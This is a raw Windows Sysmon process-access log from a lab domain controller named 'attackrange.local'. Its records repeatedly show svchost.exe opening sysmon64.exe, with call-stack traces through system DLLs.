12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001762Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001761Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001760Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001759Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001758Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001757Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.565{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001756Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.565{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001755Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.565{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001754Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.565{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001753Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.565{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001752Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.565{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001751Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.565{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001750Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.565{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001749Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.565{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001748Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.549{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001747Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.549{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001746Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.549{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001745Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.549{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001744Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.549{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001743Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.549{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001742Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.549{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001741Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.549{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001740Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.549{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001739Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 